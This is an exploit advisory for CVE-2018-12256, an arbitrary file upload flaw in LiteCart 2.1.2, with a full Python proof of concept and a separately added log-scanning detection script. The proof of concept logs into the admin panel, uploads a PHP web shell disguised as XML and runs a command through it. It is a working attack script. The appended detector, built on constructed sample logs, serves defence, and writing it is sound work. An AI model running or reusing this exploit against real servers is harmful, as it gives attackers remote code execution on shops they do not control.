LiteCart 2.1.2 Arbitrary File Upload

2018.08.28
Credit: Haboob Team
Risk: High
Local: No
Remote: Yes
CWE: CWE-264

# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
# Date: 2018-08-27
# Exploit Author: Haboob Team
# Software Link: https://www.litecart.net/downloading?version=2.1.2
# Version: 2.1.2
# CVE : CVE-2018-12256

# 1. Description
# admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers
# to upload a malicious file (resulting in remote code execution) by using the text/xml
# or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.

# 2. Proof of Concept

#!/usr/bin/env python
import mechanize
import cookielib
import urllib2
import requests
import sys
import argparse
import random
import string

parser = argparse.ArgumentParser(description='LiteCart')
parser.add_argument('-t', help='admin login page url - EX: https://IPADDRESS/admin/')
parser.add_argument('-p', help='admin password')
parser.add_argument('-u', help='admin username')
args = parser.parse_args()

if(not args.u or not args.t or not args.p):
    sys.exit("-h for help")

url = args.t
user = args.u
password = args.p

br = mechanize.Browser()
cookiejar = cookielib.LWPCookieJar()
br.set_cookiejar( cookiejar )
br.set_handle_equiv( True )
br.set_handle_redirect( True )
br.set_handle_referer( True )
br.set_handle_robots( False )
br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]

response = br.open(url)
br.select_form(name="login_form")
br["username"] = user
br["password"] = password
res = br.submit()

response = br.open(url + "?app=vqmods&doc=vqmods")
one=""
for form in br.forms():
    one= str(form).split("(")
    one= one[1].split("=")
    one= one[1].split(")")
    one = one[0]

cookies = br._ua_handlers['_cookies'].cookiejar
cookie_dict = {}
for c in cookies:
    cookie_dict[c.name] = c.value

rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))

files = {
    'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
    'token':one,
    'upload':(None,"Upload")
}

response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)
r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
if r.status_code == 200:
    print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
    print r.content
else:
    print "Sorry something went wrong"
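
A detection sketch for the behaviour described above, added here as an example and not part of the original advisory or of LiteCart: it scans web access logs for requests to non-.xml files under vqmod/xml/ and records whether the same client earlier POSTed to the vQmod upload form. The log lines, IP addresses, file names and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real host.
SAMPLE_LOG = """\
198.51.100.7 - - [27/Aug/2018:10:01:02 +0000] "POST /admin/?app=vqmods&doc=vqmods HTTP/1.1" 200 5120 "-" "python-requests/2.19.1"
198.51.100.7 - - [27/Aug/2018:10:01:03 +0000] "GET /admin/../vqmod/xml/EXAMPLE.php?c=id HTTP/1.1" 200 54 "-" "python-requests/2.19.1"
192.0.2.10 - - [27/Aug/2018:10:05:00 +0000] "POST /admin/?app=vqmods&doc=vqmods HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Aug/2018:10:06:00 +0000] "GET /vqmod/xml/index.xml HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.44 - - [27/Aug/2018:11:00:00 +0000] "GET /vqmod/xml/old.PHP HTTP/1.1" 404 0 "-" "curl/7.61.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def normalize(path):
    """Collapse '.' and '..' segments so '/admin/../vqmod/xml/x' is matched too."""
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)

def find_suspicious(log_text):
    """Flag requests for non-.xml files under vqmod/xml/, noting prior upload POSTs."""
    uploaders = set()  # client IPs seen POSTing to the vQmod upload form
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        path, qs = normalize(url.path), parse_qs(url.query)
        if method == "POST" and qs.get("app") == ["vqmods"] and qs.get("doc") == ["vqmods"]:
            uploaders.add(ip)
        elif "/vqmod/xml/" in path and not path.lower().endswith(".xml"):
            findings.append({"ip": ip, "path": path, "status": int(status),
                             "after_upload": ip in uploaders})
    return findings

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f)
```

A finding with status 200 means the file exists on disk, so the vqmod/xml/ directory should be inspected directly as well.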


Copyright 2018, cxsecurity.com